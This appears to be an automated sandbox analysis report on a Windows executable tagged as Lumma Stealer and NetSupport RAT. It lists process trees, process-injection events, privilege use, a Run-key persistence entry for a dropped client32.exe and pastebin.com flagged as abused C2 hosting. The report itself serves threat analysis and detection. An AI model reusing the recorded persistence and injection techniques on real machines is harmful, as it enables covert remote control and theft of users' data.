Malware Analysis Report

2024-10-19 01:37

Sample ID 241007-cl9kmazanr
Target f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe
SHA256 f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266
Tags
discovery netsupport execution persistence rat lumma stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266

Threat Level: Known bad

The file f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe was found to be: Known bad.

Malicious Activity Summary

discovery netsupport execution persistence rat lumma stealer

Lumma Stealer, LummaC

NetSupport

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Modifies registry class

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-07 02:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240708-en

Max time kernel

120s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2120 wrote to memory of 2180 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2120 wrote to memory of 2180 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2120 wrote to memory of 2180 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2120 wrote to memory of 2180 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2120 wrote to memory of 2180 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2120 wrote to memory of 2180 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2120 wrote to memory of 2180 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

126s

Max time network

160s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3560 wrote to memory of 1756 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3560 wrote to memory of 1756 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3560 wrote to memory of 1756 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1756 -ip 1756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4500,i,4174666705242427184,7333705955694532165,262144 --variations-seed-version --mojo-platform-channel-handle=4512 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

122s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"

Signatures

NetSupport

rat netsupport

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TempControll = "C:\\Users\\Admin\\AppData\\Roaming\\TempControll\\client32.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3320 set thread context of 3112 N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe C:\Windows\SysWOW64\cmd.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 916 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 916 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 916 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 684 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 684 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 684 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 3616 wrote to memory of 744 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 744 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 744 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 744 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 744 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 744 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 744 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 744 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3616 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 4216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
